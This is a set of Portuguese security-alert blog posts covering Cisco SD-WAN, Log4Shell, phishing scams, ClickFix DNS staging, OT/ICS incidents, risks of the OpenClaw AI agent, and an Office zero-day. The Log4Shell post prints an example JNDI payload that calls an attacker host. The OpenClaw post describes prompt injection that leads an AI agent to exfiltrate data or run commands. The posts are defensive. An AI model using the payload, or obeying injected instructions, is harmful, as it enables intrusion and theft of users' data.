Alerta: Atores Maliciosos Visam Ativamente Controladores Cisco Catalyst SD-WAN

Resumo Executivo

Identificamos uma campanha global de ciberataques perpetrada por agentes maliciosos, focada na exploração de vulnerabilidades em dispositivos de rede SD-WAN (Software-Defined Wide Area Network). Os atacantes estão explorando uma falha de segurança crítica nos controladores Cisco Catalyst SD-WAN para obter acesso não autorizado e estabelecer persistência de longo prazo nas redes corporativas.


Detalhes da Ameaça no Cisco Catalyst

A vulnerabilidade central, registrada como CVE-2026-20127, consiste em um bypass de autenticação no controlador Cisco Catalyst SD-WAN. Uma vez que a exploração é bem-sucedida, os atores da ameaça conseguem adicionar um dispositivo par (peer) não autorizado à rede. Este ponto de entrada inicial é então utilizado para escalar privilégios, culminando na obtenção de acesso root ao sistema. Com esse nível de controle, os invasores podem garantir sua permanência na infraestrutura SD-WAN, representando um risco significativo e contínuo para a organização.


Métricas da Ameaça no Cisco Catalyst

A CVE-2026-20127 possui pontuação CVSS v3.1 de 10.0 (crítica), com vetor AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H.

Essa pontuação máxima reflete alto impacto em confidencialidade, integridade e disponibilidade, com exploração remota sem autenticação.

Também há uma métrica CVSS v2 de 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

O EPSS é de 0.976, indicando alta probabilidade (cerca de 97,6%) de exploração nos próximos 30 dias.


Esforço Coordenado de Resposta

Em resposta a esta ameaça, uma coalizão de agências internacionais de segurança cibernética, incluindo a Agência de Segurança Nacional dos EUA (NSA), a Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA), e os centros de segurança cibernética da Austrália, Canadá, Nova Zelândia e Reino Unido, publicou o Guia de Caça de Vulnerabilidade Exploitation of Cisco SD-WAN appliances“. Este documento, fundamentado em dados de investigações reais, foi desenvolvido para auxiliar os defensores de rede na detecção e resposta às atividades maliciosas.


Versões Vulneráveis Confirmadas

As versões afetadas pela CVE-2026-20127 incluem Cisco Catalyst SD-WAN Controller (ex-vSmart) e Manager (ex-vManage) em implantações on-premise e na nuvem hospedada pela Cisco.

  • Antes da versão 20.9.1: Migre para uma release corrigida.
  • 20.9 até 20.9.8.1 (corrigida em 20.9.8.2, estimada para 27/02/2026).
  • 20.12.5 até 20.12.5.2 (corrigida em 20.12.5.3).
  • 20.12.6 até 20.12.6.0 (corrigida em 20.12.6.1).
  • 20.13 até 20.15.4.1 (corrigida em 20.15.4.2).
  • 20.14 até 20.15.4.1 (corrigida em 20.15.4.2).
  • 20.15 até 20.15.4.1 (corrigida em 20.15.4.2).
  • 20.16 até 20.18.2.0 (corrigida em 20.18.2.1).
  • 20.18 até 20.18.2.0 (corrigida em 20.18.2.1).

Recomendações de Mitigação

As organizações autoras do guia recomendam enfaticamente que os administradores de rede adotem as seguintes medidas imediatas:

Ação Recomendada:Descrição:
Coleta de ArtefatosPreserve evidências cruciais, como snapshots virtuais e logs completos da tecnologia SD-WAN, para análise forense.
Aplicação de PatchesRevise os boletins de segurança da Cisco: “Cisco Catalyst SD-WAN Vulnerabilities” e “Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability”, e aplique todas as atualizações necessárias para corrigir a vulnerabilidade CVE-2026-20127.
Caça a Ameaças (Threat Hunting)Execute buscas proativas por evidências de comprometimento, seguindo as diretrizes detalhadas no Guia de Caça.
Fortalecimento do Ambiente (Hardening)Implemente as melhores práticas descritas no Guia de Fortalecimento do Cisco Catalyst SD-WAN.

Diretrizes de Fortalecimento (Hardening)

O guia de hardening da Cisco oferece uma abordagem abrangente para proteger a infraestrutura SD-WAN. As principais recomendações incluem:

  • Controles de Perímetro de Rede: Posicione os componentes de controle atrás de um firewall, isole as interfaces da VPN 512 e utilize blocos de IP para provisionamento manual de dispositivos de borda.
  • Acesso ao Gerenciador SD-WAN: Substitua o certificado autoassinado da interface de usuário web por um certificado emitido por uma autoridade confiável.
  • Segurança do Plano de Controle e Dados: Utilize chaves par a par (pairwise keying) para aumentar a segurança da comunicação.
  • Tempo Limite de Sessão: Configure o tempo de inatividade da sessão para o menor período possível que não prejudique a operação.
  • Gerenciamento de Logs: Encaminhe todos os logs para um servidor syslog remoto e seguro para garantir a centralização e a integridade dos registros.

Referências

[1] Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability

[2] Exploitation of Cisco SD-WAN appliances

[3] CVE-2026-20127

You’ve been Log4pwned!

Já há algum tempo venho participando do processo de Gestão de Vulnerabilidades aqui da CYLO, tem sido uma tarefa desafiadora e, por mais que cada ambiente que eu faço essa gestão tenha as suas individualidades, em quase todos os ambientes me deparo sempre com as mesmas falhas, figurinhas repetidas que estão presentes em 80% dos ambientes, a ideia de escrever esse post é totalmente baseada em descrever essas vulnerabilidades, que eu sei que existem no seu ambiente, mesmo não te conhecendo.

E para começar, não poderia ser diferente, é impossivel falar de vulnerabilidades críticas que viraram o mundo de cabeça pra baixo, sem citar a tão temida e assustadora CVE-2021-44228. Ou para os intímos Log4shell. O terror dos analistas de SOC em meados de 2021/2022 e em muitos casos, até hoje!

Se você vive em baixo de uma pedra, e não faz ideia do que estou falando, fique calmo que vou te explicar o que é a vulnerabilidade CVE-2021-44228, qual produto ela afeta, e como ela é explorada por agentes de ameaça.

Descrição da vulnerabilidade

Log4Shell (CVE-2021-44228) é uma falha na biblioteca de logging Java Log4j desenvolvida pelo Apache afetando as versões 2.0-beta9 até 2.15 (há contradições sobre o primeiro patch de correção dessa vulnerabilidade que, teóricamente foi lançada na versão 2.15 porém o patch não funcionou completamente e em alguns casos específicos ainda era possível realizar a exploração) que simplesmente permitia que QUALQUER texto logado virasse um CÓDIGO EXECUTÁVEL no servidor, mas como isso funciona?

Na prática, o Log4j permitia que mensagens de log contivessem expressões no formato ${...}, que eram interpretadas automaticamente durante o processamento do log. Uma dessas expressões era ${jndi:...}, relacionada ao JNDI, uma API do Java usado para localizar e obter objetos ou recursos em servidores externos, como serviços de diretório LDAP. Ao processar essa expressão, o Log4j realizava uma consulta ao servidor indicado e podia carregar o conteúdo retornado.

Exploração da CVE-2021-44228

Agora, entendendo onde está a falha na biblioteca Log4j presente no servidor Apache vulnerável. Quando o atacante identifica essa condição, ele passa à exploração (e acredite ele vai explorar), fazendo com que a aplicação registre em log algum dado controlado pelo atacante (como cabeçalho HTTP User-Agent ou campo de login) contendo uma expressão JNDI maliciosa, aqui vai um exemplo de uma requisição maliciosa:

${jndi:ldap://servidor-do-atacante/mimikatz.exe}.

Quando o Log4j processa esse log, ele irá interpretar a expressão ${jndi:...} e usa o JNDI para consultar o servidor LDAP do atacante, que responde com uma referência a uma classe Java remota. A JVM da aplicação então baixa e carrega essa classe, executando o código nela contido no contexto do processo vulnerável, resultando em um RCE que vai te dar pesadelos.

Relevância da vulnerabilidade CVE-2021-44228

Após entender o que é a falha representada pela CVE-2021-44228, e entender como atacantes realizam sua exploração, pergunto. Por que se preocupar tanto com essa vulnerabilidade? qual sua relevância? afinal existem milhares de outras falhas que descrevem a possibilidade de um RCE em outros produtos.

O motivo é bem simples, e preocupante. Mesmo após mais de 5 anos desde sua descoberta, a vulnerabilidade Log4Shell ainda possui um EPSS de 94.36% e um CVSS score que pessoalmente acredito que nunca irá abaixar de 10/10, dados esses que foram coletados no dia 26/02/2026, refletindo um cenário em que ainda há milhares se não milhões de aplicações vulneráveis a CVE-2021-44228, e que estão ativamente sendo explorados todos os dias, afinal é facil de explorar, em muitos casos, não necessitando de privilégios elevados, literalmente o paraíso dos Adversários.

Portanto, se quiser dormir tranquilo, certifique-se de atualizar o Log4J da sua aplicação para a versões >= 2.17.1 o quanto antes (tem que ser literalmente para ontem!). E para aqueles que chegaram agora e não fazem ideia se estão com suas aplicações vulneraváveis, não perca mais tempo, pois o atacante provavelmente já tem essa resposta, e ele não vai perder nem um segundo.

Refêrencias

CVE-2021-44228 : Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12

Known Exploited Vulnerabilities Catalog | CISA

NVD – CVE-2021-44228

Regularização falsa: golpe de phishing usa CNH como isca

Na tarde de hoje, meu pai me encaminhou um e-mail sobre a suposta regularização de uma infração em sua CNH. O remetente se identificava como “Regularize CNH”, mas o endereço era claramente incomum para algo que alegava ser do gov.br: store+79974727929@g.shopifyemail.com:

Ao inspecionar melhor o conteúdo, o botão verde que prometia “resolver o problema” levava para um subdomínio que não pertence ao gov.br: regularize-cnh.myshopfy.com. A partir dessa página, o usuário é redirecionado para uma tela de pagamento em pay.cnhpagamentos.site, onde diversos detalhes entregam a fraude:

  • Botões para aumentar ou diminuir a quantidade de itens “Regularize” no carrinho, permitindo adicionar um número arbitrário de unidades.;
  • Uma seção de identificação do pagador sem qualquer autenticação ou login, algo incompatível com serviços oficiais relacionados à CNH.

Analisando o código‑fonte da página, é possível encontrar um script em JavaScript que, ao clicar no botão “GERAR PIX”, envia para o gateway de pagamento cffp.cloudfox.net um token que provavelmente identifica a conta que receberá o dinheiro. Em uma busca rápida, descobri que a Cloud Fox atua como gateway de pagamento parceiro da Shopify, plataforma conhecida por hospedar lojas de e-commerce.

Realizando uma pesquisa rápida, percebi que Cloud Fox é um gateway de pagamento parceiro da Shopfy, uma plataforma de criação e hospedagem de e-commerces.

O caso reforça o alerta para um tipo de golpe que vem se sofisticando: e‑mails de phishing explorando temas sensíveis, como CNH e multas de trânsito, para induzir pagamentos via PIX. Em situações assim, é fundamental conferir o remetente, verificar se o domínio faz sentido para o serviço citado, inspecionar para onde apontam botões e links e ficar atento a inconsistências nas páginas de destino.

Phishing: Polícia Civil do Amapá

Recentemente recebemos um report de um cliente onde havia recebido um e-mail originado da Polícia Civil do Amapá.

O remetente referência uma pessoa chamda Nashya Ribeiro com o e-mail: nashyaribeiro@policiacivil[.]ap[.]gov[.]br.

O e-mail gera urgência determinando um prazo de 1 dia informando que os detalhes da solicitação se encontram no PDF

Passando por uma pesquisa rápida o domínio policiacivil[.]ap[.]gov[.]br é realmente utilizado pela ´Polícia Civil do Amapa – hxxps[://]policiacivil[.]portal[.]ap[.]gov[.]br/pagina/unidades-policiais/especializadas

Dentro do PDF tem um link no botão instalar certificado que aponta para um endereço que atualmente quando acessado, já se apresenta fora do ar. hxxps[://]195[.]177[.]94[.]193/[.]certificados[.]ap[.]gov[.]br

O link estava hospedado em um datacenter localizado nos Estados Unidos denominado STELLARGROUP aparentemente de origem Ucraniana.

Identificamos através de fontes externas que a campanha ainda continua ativa seguindo o mesmo padrão de e-mails e anexos.

Conhecendo o MITRE | ATT&CK.

Embora ter ferramentas de proteção são importantes, entender a mentalidade do atacante, como conhecer quais as táticas e métodos utilizados por ele durante um ataque, também é fundamental para os profissionais de cibersegurança.

Por que utilizar o MITRE ATT&CK? O que é?

Criado pela MITRE, o ATT&CK é um framework, uma base de conhecimento global gratuita, contendo informações como as táticas, técnicas e procedimentos adotados por cibercriminosos, baseado em estudos de caso real de incidentes, foram identificadas e mapeadas as informações de como os adversários agem e o ciclo de vida de um ataque no ambiente de tecnologia.

O framework da Mitre ATT&CK foi organizado em um modelo de matriz de domínios tecnológicos, onde buscaram organizar as informações para os comportamentos do adversário, seguindo uma divisão em matrizes de domínios tecnológicos, conforme abaixo:

  • Enterprise ATT&CK: Representando informações para ataques a redes empresariais e tecnologias de nuvem para ambientes corporativos.
  • Mobile ATT&CK: Representando informações para ataques direcionados a dispositivos móveis.
  • ICS ATT&CK: Representando informações para ataques de sistemas de controle industrial (ICS).

Baseado em sua matriz de domínio tecnológico, foi estruturado as informações dividindo em “táticas, técnicas e subtécnicas” para os comportamentos do adversário, seguindo as definições abaixo:

  • Táticas: Representam o “porque”, seria o objetivo do atacante.
  • Técnicas: Representam o “como”, como alcançar o objetivo definido pelas táticas.
  • Subtécnicas: Seria um nível maior de detalhamento das técnicas e comportamentos do adversário.

Frameworks como o do Mitre ATT&CK, permitem que as equipes de segurança antecipem movimentos de atacantes e realizem uma proteção de forma proativa nas organizações, antecipando ações maliciosas e ajudando a implementar controles mais eficazes nos ambientes de tecnologia.

Texto acima foi um breve resumo do que é ATT&CK e podemos encontrar mais informações acessando os endereços: Get Started | MITRE ATT&CK® / MITRE ATT&CK® .

ClickFix com DNS Staging distribui malware via PowerShell

A nova campanha de ataque, que possui como alvo o sistema Windows da Microsoft, caracteriza uma evolução do método de engenharia social ClickFix, na qual consultas DNS realizadas por meio do utilitário nativo nslookup são utilizadas como mecanismo de staging e entrega de código malicioso.

Nesse modelo, respostas DNS são manipuladas para transportar dados codificados que contêm comandos e scripts PowerShell, posteriormente reconstruídos e executados no host comprometido.

A técnica permite o carregamento progressivo de payloads e a instalação de malware em sistemas Windows, incluindo Remote Access Trojans (RATs) e Infostealers, explorando uma abordagem living-off-the-land que utiliza ferramentas legítimas do sistema operacional.

O uso do protocolo DNS como canal de transporte contribui significativamente para evasão de detecção baseada em rede, uma vez que o tráfego se mistura a consultas legítimas e frequentemente não é submetido a inspeção profunda em ambientes corporativos.

A campanha representa uma evolução significativa de ataques baseados em engenharia social, explorando ferramentas legítimas do próprio sistema operacional para contornar mecanismos tradicionais de defesa.


Cadeia de infecção observada

O método conhecido como ClickFix baseia-se em engenharia social. A vítima é induzida a executar manualmente comandos apresentados como soluções para supostos problemas técnicos. Normalmente, o usuário recebe instruções para copiar e executar comandos em terminais do Windows, acreditando estar resolvendo um problema legítimo.

Nesta nova campanha, os atacantes aprimoraram o método ao integrar o uso de consultas DNS como mecanismo de entrega de payload. A cadeia de passos observada tem sido a seguinte:

  • A vítima é levada (por instruções passo a passo em sites, e‑mails ou chats de “suporte”) a abrir o diálogo Executar do Windows (Win+R) ou um terminal e colar um comando aparentemente benigno.
  • Esse comando executa o nslookup apontando NÃO para o resolvedor DNS padrão da máquina, mas para um servidor DNS externo controlado pelo atacante (IP ou domínio hard‑coded no comando).
  • A resposta DNS vem especialmente formatada: o campo “Name:” ou dados de resposta contêm um script PowerShell ou dados codificados que são filtrados e passados diretamente para execução como segundo estágio.
  • O PowerShell então baixa um arquivo ZIP a partir da infraestrutura do atacante, contendo um runtime Python portátil e vários scripts que fazem reconhecimento de host/domínio, instalam persistência e puxam payloads adicionais.

Por que este ataque é preocupante

O uso do DNS como canal de entrega aumenta significativamente a capacidade de evasão, pois:

  • O DNS raramente é bloqueado em ambientes corporativos;
  • Em muitas organizações não inspecionam profundamente consultas DNS;
  • As ferramentas utilizadas são nativas do Windows (living-off-the-land).

Isso reduz a eficácia de soluções tradicionais baseadas apenas em assinaturas ou monitoramento de downloads.


Recomendações de mitigação

Organizações e usuários devem adotar medidas preventivas imediatas:

Para equipes de segurança

  • Monitorar uso incomum de nslookup e PowerShell;
  • Implementar inspeção e logging avançado de tráfego DNS;
  • Detectar consultas DNS com volumes anormais ou respostas longas;
  • Aplicar políticas de execução restrita para PowerShell; e
  • Utilizar EDR/XDR com detecção COMPORTAMENTAL.

Para usuários

  • Nunca executar comandos sugeridos por sites ou pop-ups;
  • Desconfiar de páginas que pedem ações manuais no terminal; e
  • Validar instruções técnicas apenas em fontes oficiais.

Conclusão

A campanha identificada demonstra uma tendência crescente no cenário de ameaças: o abuso de ferramentas legítimas e protocolos essenciais da Internet para contornar mecanismos tradicionais de defesa.

O uso combinado de engenharia social ClickFix e entrega de payload via DNS reforça a necessidade de estratégias de defesa baseadas em comportamento, telemetria e análise contextual, e não apenas em bloqueios convencionais.

Incidentes cibernéticos no setor energético expondo fragilidades críticas em OT/ICS

Temos observado, em diferentes regiões, campanhas de ataque em larga escala direcionadas a infraestruturas de tecnologia operacional e automação (OT), sistemas de controle industrial (ICS) e dispositivos IoT empregados em geração e distribuição de energia, especialmente em ativos distribuídos como parques eólicos, usinas solares e subestações remotas.

Nesses eventos invasores exploraram vulnerabilidades antigas sem patchs, falhas de higiene de senhas e exposição indevida de dispositivos de borda, mantendo persistência prolongada na rede. Foram comprometidos endpoints remotos, firewalls e concentradores VPN expostos diretamente à internet, muitos sem autenticação multifator e com credenciais fracas.

Esses ambientes compartilham características que ampliam significativamente a superfície de ataque, incluindo dispositivos de borda expostos à internet, acesso remoto permanente por VPN, credenciais fracas ou reutilizadas, equipamentos legados com baixa cadência de atualização e integração insuficiente entre equipes de TI e automação e operação.

Os impactos mais frequentes não são necessariamente apagões imediatos, mas sim perda de telemetria, indisponibilidade de controle remoto, necessidade de operação manual de campo, substituição de equipamentos e degradação prolongada da capacidade operacional. Em cenários extremos, observa-se uso de malware destrutivo com objetivo de sabotagem e, majoritariamente, sequestro de dados.


Recomendações

Diante desse contexto, recomenda-se que organizações do setor energético e industrial adotem uma postura de defesa em profundidade específica para OT/ICS, contemplando:

1. Medidas técnicas essenciais

  • Autenticação multifator obrigatória para todo acesso remoto;
  • Segmentação rigorosa entre redes IT, OT e IoT, com zonas bem definidas;
  • Eliminação de exposição direta de dispositivos de borda à internet;
    • Gestão contínua de vulnerabilidades e aplicação programada de patches;
  • Inventário completo de ativos OT, incluindo firmware e versões;
  • Monitoramento de integridade de endpoints, PLCs (controladoras lógicas programáveis) e gateways;
  • Detecção de perda de comunicação ou telemetria como indicador de incidente; e
  • Backups offline e planos de rápida reposição de equipamentos críticos.

2. Medidas operacionais e organizacionais

• Estabelecer SOC ou monitoramento dedicado a OT;
• Integrar feeds de threat intelligence setoriais, quando disponíveis;
• Realizar testes periódicos de resposta a incidentes e recuperação operacional;
• Desenvolver playbooks específicos para indisponibilidades;
• Realizar capacitação conjunta de equipes de TI, engenharia e automação; e
• Realizar exercícios de contingência com operação manual.


Alerta de Segurança: Os Riscos Ocultos do OpenClaw

Nas últimas semanas, uma ferramenta de assistente de IA de código aberto, conhecida por seus vários nomes — Clawdbot, Moltbot e, mais recentemente, OpenClaw — ganhou imensa popularidade. Prometendo ser um “IA que realmente faz coisas”, o OpenClaw oferece a capacidade de automatizar uma vasta gama de tarefas digitais, desde gerenciar e-mails e mensagens até realizar ações complexas em nome do usuário. No entanto, por trás de sua fachada de produtividade e inovação, esconde-se um pesadelo de segurança.

Este alerta tem como objetivo detalhar os graves riscos de segurança associados ao OpenClaw e recomendar fortemente contra sua instalação em qualquer ambiente de produção ou em sistemas que contenham dados sensíveis.

Se você está usando ou pretende usar isso, recomendamos ler atentamente o alerta a seguir.


O Que é o OpenClaw?

O OpenClaw é um agente de IA autônomo e auto-hospedado que opera localmente na máquina do usuário. Ele se integra a aplicativos de mensagens populares como WhatsApp e iMessage, e pode executar uma variedade de tarefas, como agendar voos, fazer reservas em restaurantes, controlar navegadores e gerenciar arquivos. Sua arquitetura permite a expansão de suas capacidades através de “skills” (habilidades) que a comunidade pode desenvolver e compartilhar. Essa combinação de autonomia, acesso local e extensibilidade é o que o tornou viral, mas também é a fonte de seus profundos problemas de segurança [1][2].


Falhas Arquiteturais e Vetores de Exploração

A arquitetura fundamental do OpenClaw cria uma confluência de riscos que o torna perigoso por padrão, especialmente quando mal configurado ou exposto à internet.

“De uma perspectiva de capacidade, o OpenClaw é inovador. É tudo o que os desenvolvedores de assistentes pessoais de IA sempre quiseram alcançar. De uma perspectiva de segurança, é um pesadelo absoluto.” – Cisco [2]

Os principais problemas de design incluem:

  • Altos Privilégios por Padrão: Para funcionar, o OpenClaw requer acesso de alto nível ao sistema operacional, permitindo-lhe executar comandos de shell, ler e escrever arquivos e executar scripts. Se comprometido, o agente se torna um “superusuário fantasma” nas mãos de um ator mal intencionado [4].
  • Vazamento de Credenciais e Chaves de API: Inúmeros casos de instâncias do OpenClaw mal configuradas foram encontradas expostas na internet, vazando chaves de API em texto plano, tokens de bot do Telegram, credenciais do Slack e históricos de conversas [1].
  • Superfície de Ataque Expandida: A integração com aplicativos de mensagens estende a superfície de ataque, permitindo que invasores enviem prompts maliciosos para induzir comportamentos indesejados [2].

Vulnerabilidades Críticas e Riscos Detalhados

A pesquisa de segurança revelou várias vulnerabilidades e vetores de ataque específicos que tornam o uso do OpenClaw extremamente arriscado.

1. Execução Remota de Código (RCE) com Um Clique (CVE-2026-25253)

Em 01/02/2026 uma vulnerabilidade de alta gravidade (CVSS 8.8) foi identificada, permitindo a execução remota de código mediante um link malicioso. A falha reside na interface de controle (Control UI), que confia na URL do gateway sem validação adequada. Ao clicar em um link criado por um invasor, o token de autenticação do gateway da vítima é enviado para o servidor do invasor. Com este token, o invasor pode se conectar ao gateway da vítima, modificar configurações de segurança (como desativar o sandbox) e executar comandos arbitrários no sistema hospedeiro [3].

“O ataque funciona mesmo quando o gateway está configurado para escutar apenas em loopback, porque o navegador da vítima atua como a ponte.” – Peter Steinberger, criador do OpenClaw [3]

2. Injeção de Prompt (Prompt Injection)

O problema de injeção de prompt, ainda não resolvido no campo da IA, é particularmente perigoso no OpenClaw. Um invasor pode incorporar instruções maliciosas em conteúdo que o agente irá processar (como uma página da web ou um e-mail). O agente pode então ser levado a exfiltrar dados sensíveis, enviar informações para um servidor controlado pelo invasor ou executar comandos perigosos no sistema do usuário [1].

3. “Skills” Maliciosas e Ataques à Cadeia de Suprimentos

A capacidade de estender o OpenClaw com “skills” de terceiros abre um perigoso vetor de ataque de cadeia de suprimentos. Pesquisadores já descobriram “skills” maliciosas que funcionam como malware. Em um exemplo, uma extensão falsa do VS Code para o ClawdBot era, na verdade, um Trojan projetado para vigilância e roubo de dados. Em outro, um pesquisador de segurança criou uma “skill” com backdoor que foi baixada milhares de vezes, demonstrando a facilidade com que a confiança da comunidade pode ser abusada [1][2].

4. Confusão de Identidade e Golpes

A rápida sucessão de mudanças de nome (de Clawdbot para Moltbot e depois para OpenClaw) criou uma janela de oportunidade para golpistas. Repositórios falsos e golpes de criptomoeda surgiram, explorando a confusão. Um token falso de criptomoeda “Clawdbot AI” conseguiu arrecadar $16 milhões antes de seu valor despencar [1][4].


NUNCA Usar o OpenClaw em Produção

Instalar o OpenClaw, MoltBolt ou Clawdbot em um ambiente de produção é um risco inaceitável. As razões são claras:

  • Risco de Violação de Dados: A exposição de credenciais e o potencial para exfiltração de dados via injeção de prompt colocam todos os dados no sistema em risco.
  • Ponto de Entrada para a Rede: Um agente comprometido serve como uma backdoor persistente, permitindo que invasores realizem movimento lateral, escalem privilégios e comprometam toda a rede.
  • Potencial para Ransomware: Com acesso para ler e escrever arquivos, um invasor pode facilmente usar o agente para criptografar dados e exigir um resgate [4].

O uso de OpenClaw, MoltBolt ou Clawdbot em ambientes críticos, tais como áreas de saúde e ambientes industriais e de IoT pode levar a riscos consideráveis a vidas humanas.


Recomendações

Com base na análise técnica das vulnerabilidades e riscos inerentes, nossa recomendação é inequívoca:

  1. NÃO INSTALE O OPENCLAW EM AMBIENTES DE PRODUÇÃO: Nunca, sob nenhuma circunstância, esta ferramenta deve ser usada em sistemas que contenham dados reais, sensíveis ou que estejam conectados a redes corporativas.
  2. USE APENAS EM AMBIENTES TOTALMENTE ISOLADOS: Se você deseja experimentar o OpenClaw por curiosidade, faça-o em uma máquina virtual ou contêiner completamente isolado, sem acesso a dados pessoais, credenciais ou qualquer outra rede.
  3. DESCONFIE DE TODAS AS “SKILLS” DE TERCEIROS: O ecossistema de “skills” não é seguro. Trate cada extensão como um potencial malware.
  4. ENTENDA QUE A ARQUITETURA É INERENTEMENTE INSEGURA: Mesmo com configurações de segurança e firewalls, o design fundamental do OpenClaw, que concede alta autonomia e privilégios a um agente de IA, representa um risco que não pode ser totalmente mitigado no momento.

Palavras finais

O OpenClaw é um experimento fascinante sobre o futuro dos agentes de IA, mas é apenas isso: um experimento.

Sua arquitetura, embora poderosa, ignora princípios de segurança fundamentais, transformando-o em uma ferramenta perigosa nas mãos de usuários desavisados e um alvo valioso para invasores.

A conveniência oferecida não justifica o risco catastrófico que ele representa. No momento de escrita desse alerta, nossa única recomendação possível é que, Até que esses problemas fundamentais de segurança sejam resolvidos, a única abordagem sensata é manter o OpenClaw longe de qualquer sistema importante.


Referências

[1] ZDNET. “OpenClaw is a security nightmare – 5 red flags you shouldn’t ignore (before it’s too late)”. https://www.zdnet.com/article/openclaw-moltbot-clawdbot-5-reasons-viral-ai-agent-security-nightmare/

[2] Cisco Blogs. “Personal AI Agents like OpenClaw Are a Security Nightmare”. https://blogs.cisco.com/ai/personal-ai-agents-like-openclaw-are-a-security-nightmare

[3] The Hacker News. “OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link”. https://thehackernews.com/2026/02/openclaw-bug-enables-one-click-remote.html [4] Vectra AI. “From Clawdbot to OpenClaw: When Automation Becomes a Digital Backdoor”. https://www.vectra.ai/blog/clawdbot-to-moltbot-to-openclaw-when-automation-becomes-a-digital-backdoor

Nova fraude – Central de atendimento gov.br

Recebemos recentemente um caso onde uma conta de WhatsApp For Business se passa por uma Central de atendimento denominada: Central de Atendimento ao Cliente – Rec SS

Percebam que a empresa foi cadastrada há um mês no WhatsApp for Business.

Nesta fraude o golpista (como sempre) tenta persuadir a clicar em um link para verificar a pendência que consta no CPF da vítima.

URL

hxxps[://]consulta[.]situacaoregular[.]ch/consulta[.]html?cpf=<CPF da Vítima>

Em breve uma análise aprofundada do comportamento…

Atualização de Emergência Microsoft

Esse é um alerta crítico. A Microsoft lançou no início da noite de ontem (26 de janeiro de 2026) uma atualização de segurança de emergência, para corrigir a vulnerabilidade zero-day CVE-2026-21509, que permite contornar de proteções contra controles inseguros nos aplicativos Microsoft Office, fazendo que um ataque possa acontecer por intermédio de um documento ou arquivo malicioso, possivelmente sem interação do usuário.

A vulnerabilidade atinge aplicações Microsoft Office / 365 tanto no Windows como no macOS (veja comentário sobre o MacOS no final dessa postagem).

Temos notícias de que vulnerabilidade essa está sendo explorada ativamente por atacantes usando documentos maliciosos.

Essa falha afeta todas as versões, tais como Office 2016, 2019, LTSC 2021/2024 e Microsoft 365 Apps Enterprise, bem como Microsoft 365 Standalone ou Famility Edition, tanto no Windows quanto no macOS.


O que fazer, imediatamente

  1. Aplique as atualizações de segurança do Microsoft Office via Microsoft Update ou WSUS.​ 
  2. Reinicie as aplicações Microsoft 365 (muito importante), ou faça um reboot.
  3. Como mitigação temporária, configure o registro do Windows com a chave “Compatibility Flags” = 0x400 em HKEY_CURRENT_USER\Software\Microsoft\Office[version]\Common para reforçar as proteções OLE.
  4. Monitore phishing com anexos Office, dado o uso em campanhas direcionadas.

Nota importante: reinicie a aplicação

Não há um “número de versão/build” específico a partir do qual se esteja seguro, pois a correção é aplicada via service-side change (mudança da regra de proteção COM/OLE nos servidores Microsoft). Assim, Office 2021 e posteriores, que estejam atualizados, ficam protegidos com a versão mais recente que você tenha testado como atualizada em 26/01/2026, e após reinício completo dos aplicativos, sem necessidade de novo patch de instalação ou alteração no número da versão local. Ou seja, se sua versão já estiver atualizada, pode ser que você não veja uma mudança no número de versão.


Severidade CVSS E EPSS

A pontuação CVSS de severidade dessa vulnerabilidade é 7.8 (alta severidade). No momento de escrita desse alerta (27/01/2026 9h43m BRT), ela ainda não possui um score EPSS (Exploit Prediction Scoring System) disponível nos dados públicos recentes, pois foi divulgada há apenas um dia (26 de janeiro de 2026). O EPSS é atualizado diariamente pela FIRST.org com base em dados de exploração real. Como ela está sendo explorada ativamente e listada no catálogo KEV da CISA, espera-se um score EPSS elevado. Verifique em https://www.first.org/epss/search?cve=CVE-2026-21509 para o valor mais atual.


Detalhamento

As proteções contra controles COM/OLE inseguros no Microsoft Office são mecanismos de segurança implementados para bloquear a execução automática de objetos “COM” (Component Object Model) e “OLE” (Object Linking and Embedding) potencialmente maliciosos.

Objetos COM/OLE perigosos são componentes ActiveX ou objetos vinculados, embutidos, anexados ou inseridos em documentos do Microsoft Office (como ícones, gráficos ou mini-aplicativos de outros programas) que podem conter código malicioso.

Eles podem explorar a confiança automática do Office para executar scripts ou payloads sem interação segura do usuário, permitindo roubo de dados, instalação de malware ou controle remoto do sistema, como observado em ataques por meio de macros VBA, arquivos HTA ou streams OLE ofuscados em documentos Word ou Excel.

A Microsoft introduziu mecanismos de mitigação, incluindo kill bits, para reduzir esses riscos, especialmente em cenários de phishing com anexos maliciosos. Em segurança cibernética, chamamos essas proteções de “kill bits“. Esses kill bits são flags de segurança no Registro do Windows que desabilitam a criação ou execução de controles ActiveX específicos no Microsoft Office. A vulnerabilidade zero-day CVE-2026-21509 no Microsoft Office explora uma falha relacionada a essa proteção, permitindo contornar a restrição imposta pelos kill bits.


Apple / macOS

A CVE-2026-21509 afeta sim o Microsoft 365 no macOS, especificamente as Microsoft 365 Apps for Enterprise, Family e Standalone (incluindo Word, Excel, PowerPoint, Outlook), pois as mitigações OLE/COM são aplicadas no cliente Office, não dependentes do Sistema Operacional.

A Microsoft confirma que para Office 2021 e posteriores (incluindo M365), a proteção é via service-side change, requerendo reinício dos apps no macOS após propagação do serviço, similar ao Windows. Verifique atualizações no Microsoft AutoUpdate no macOS e reinicie os apps para ativar a correção emergencial de 26/01/2026.

Apesar da correção ter saído ontem, 26/1/2026, no caso do macOS a versão NÃO vulnerável é a partir de, e incluindo, a Version 16.105.1, de 20/01/2026. Em outras palavras, a instalação em si não muda de número de versão via patch tradicional; o ambiente passa a ficar protegido quando o tenant já recebeu a atualização no serviço e o usuário reinicia Word/Excel/PowerPoint/Outlook, momento em que as novas mitigações OLE/COM entram em vigor.

Caso queira verificar e forçar uma atualização no macOS, os comandos via terminal são os seguintes:

cd "/Library/Application Support/Microsoft/MAU2.0/Microsoft AutoUpdate.app/Contents/MacOS"
./msupdate --list  # Lista atualizações disponíveis
./msupdate --install  # Instala todas

Referências

[1] NVD (NIST)https://nvd.nist.gov/vuln/detail/CVE-2026-21509

[2] Microsoft MSRChttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509

[3] Microsoft – Configurações de segurança para objetos COM no Office.

[4] Microsoft Learn – Como controlar o bloqueio de componentes OLE/COM na Assinatura do Microsoft 365